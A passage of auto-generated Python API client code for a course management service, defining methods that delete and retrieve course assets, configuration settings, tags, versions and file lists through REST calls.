:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
else:
(data) = self.delete_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
return data
def delete_course_asset_with_http_info(self, course_id, relative_path, **kwargs): # noqa: E501
"""Delete an asset file from a Course # noqa: E501
Deletes the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseAssetFile or UploadCourseAssetFile endpoints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_asset_with_http_info(course_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'relative_path'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course_asset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course_asset`") # noqa: E501
# verify the required parameter 'relative_path' is set
if ('relative_path' not in params or
params['relative_path'] is None):
raise ValueError("Missing the required parameter `relative_path` when calling `delete_course_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'relative_path' in params:
query_params.append(('relativePath', params['relative_path'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course_configuration_setting(self, course_id, setting_id, **kwargs): # noqa: E501
"""Delete a configuration setting explicitly set for a Course # noqa: E501
Clears the specified setting from the course. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course level it will continue to persist and will require deletion from the level it was set. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_configuration_setting(course_id, setting_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str setting_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_configuration_setting_with_http_info(course_id, setting_id, **kwargs) # noqa: E501
else:
(data) = self.delete_course_configuration_setting_with_http_info(course_id, setting_id, **kwargs) # noqa: E501
return data
def delete_course_configuration_setting_with_http_info(self, course_id, setting_id, **kwargs): # noqa: E501
"""Delete a configuration setting explicitly set for a Course # noqa: E501
Clears the specified setting from the course. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course level it will continue to persist and will require deletion from the level it was set. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_configuration_setting_with_http_info(course_id, setting_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str setting_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'setting_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course_configuration_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course_configuration_setting`") # noqa: E501
# verify the required parameter 'setting_id' is set
if ('setting_id' not in params or
params['setting_id'] is None):
raise ValueError("Missing the required parameter `setting_id` when calling `delete_course_configuration_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'setting_id' in params:
path_params['settingId'] = params['setting_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/configuration/{settingId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course_tags(self, course_id, tags, **kwargs): # noqa: E501
"""Delete tags from a Course # noqa: E501
Deletes the specified tags from the course. Deleting tags that do not exist will still result in a success. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_tags(course_id, tags, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TagListSchema tags: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
else:
(data) = self.delete_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
return data
def delete_course_tags_with_http_info(self, course_id, tags, **kwargs): # noqa: E501
"""Delete tags from a Course # noqa: E501
Deletes the specified tags from the course. Deleting tags that do not exist will still result in a success. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_tags_with_http_info(course_id, tags, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TagListSchema tags: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'tags'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course_tags`") # noqa: E501
# verify the required parameter 'tags' is set
if ('tags' not in params or
params['tags'] is None):
raise ValueError("Missing the required parameter `tags` when calling `delete_course_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'tags' in params:
body_params = params['tags']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/tags', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course_version(self, course_id, version_id, **kwargs): # noqa: E501
"""Delete a Course Version # noqa: E501
Deletes the specified version of the course. If deleting the last remaining version of the course, the course itself will be deleted and no longer accessible. >**Caution:** >When a course is deleted, so is everything connected to this course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_version(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_version_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.delete_course_version_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def delete_course_version_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Delete a Course Version # noqa: E501
Deletes the specified version of the course. If deleting the last remaining version of the course, the course itself will be deleted and no longer accessible. >**Caution:** >When a course is deleted, so is everything connected to this course. This includes: >- Registrations >- Invitations >- Dispatches >- Debug Logs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_version_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course_version" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course_version`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `delete_course_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course_version_asset(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
"""Delete an asset file from a Course Version # noqa: E501
Deletes the asset file at the specified relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseVersionAssetFile or UploadCourseVersionAssetFile endpoints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_version_asset(course_id, version_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
else:
(data) = self.delete_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
return data
def delete_course_version_asset_with_http_info(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
"""Delete an asset file from a Course Version # noqa: E501
Deletes the asset file at the specified relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. >**Caution:** >This may have unintended consequences if the asset is still being linked to in other files in the course. Make sure that other files relying on this asset are modified or removed as well. This can be done with the ImportCourseVersionAssetFile or UploadCourseVersionAssetFile endpoints. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_version_asset_with_http_info(course_id, version_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'relative_path'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course_version_asset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course_version_asset`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `delete_course_version_asset`") # noqa: E501
# verify the required parameter 'relative_path' is set
if ('relative_path' not in params or
params['relative_path'] is None):
raise ValueError("Missing the required parameter `relative_path` when calling `delete_course_version_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'relative_path' in params:
query_params.append(('relativePath', params['relative_path'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_course_version_configuration_setting(self, course_id, version_id, setting_id, **kwargs): # noqa: E501
"""Delete a configuration setting explicitly set for a Course Version # noqa: E501
Clears the specified setting from the course version. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course level it will continue to persist and will require deletion from the level it was set. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_version_configuration_setting(course_id, version_id, setting_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str setting_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_course_version_configuration_setting_with_http_info(course_id, version_id, setting_id, **kwargs) # noqa: E501
else:
(data) = self.delete_course_version_configuration_setting_with_http_info(course_id, version_id, setting_id, **kwargs) # noqa: E501
return data
def delete_course_version_configuration_setting_with_http_info(self, course_id, version_id, setting_id, **kwargs): # noqa: E501
"""Delete a configuration setting explicitly set for a Course Version # noqa: E501
Clears the specified setting from the course version. This causes the setting to inherit a value from a higher level (e.g. application). If the configuration setting was not set at the course level it will continue to persist and will require deletion from the level it was set. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_course_version_configuration_setting_with_http_info(course_id, version_id, setting_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str setting_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'setting_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_course_version_configuration_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `delete_course_version_configuration_setting`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `delete_course_version_configuration_setting`") # noqa: E501
# verify the required parameter 'setting_id' is set
if ('setting_id' not in params or
params['setting_id'] is None):
raise ValueError("Missing the required parameter `setting_id` when calling `delete_course_version_configuration_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
if 'setting_id' in params:
path_params['settingId'] = params['setting_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/configuration/{settingId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course(self, course_id, **kwargs): # noqa: E501
"""Get detailed information about a Course # noqa: E501
Returns detailed information about the course. This includes title, update date, learning standard, and version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get detailed information about a Course # noqa: E501
Returns detailed information about the course. This includes title, update date, learning standard, and version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'include_registration_count', 'include_course_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_asset(self, course_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a Course # noqa: E501
Downloads the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_asset(course_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
else:
(data) = self.get_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
return data
def get_course_asset_with_http_info(self, course_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a Course # noqa: E501
Downloads the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_asset_with_http_info(course_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'relative_path'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_asset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_asset`") # noqa: E501
# verify the required parameter 'relative_path' is set
if ('relative_path' not in params or
params['relative_path'] is None):
raise ValueError("Missing the required parameter `relative_path` when calling `get_course_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'relative_path' in params:
query_params.append(('relativePath', params['relative_path'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_configuration(self, course_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course # noqa: E501
Returns the effective configuration settings for the course. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_configuration(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_configuration_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_configuration_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_configuration_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course # noqa: E501
Returns the effective configuration settings for the course. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_configuration_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'include_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'include_metadata' in params:
query_params.append(('includeMetadata', params['include_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SettingListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_file_list(self, course_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course # noqa: E501
Returns a list of asset files in the course. Included will be the relative path to use for the other course asset manipulation calls. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_file_list(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_file_list_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_file_list_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_file_list_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course # noqa: E501
Returns a list of asset files in the course. Included will be the relative path to use for the other course asset manipulation calls. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_file_list_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_file_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_file_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset/list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
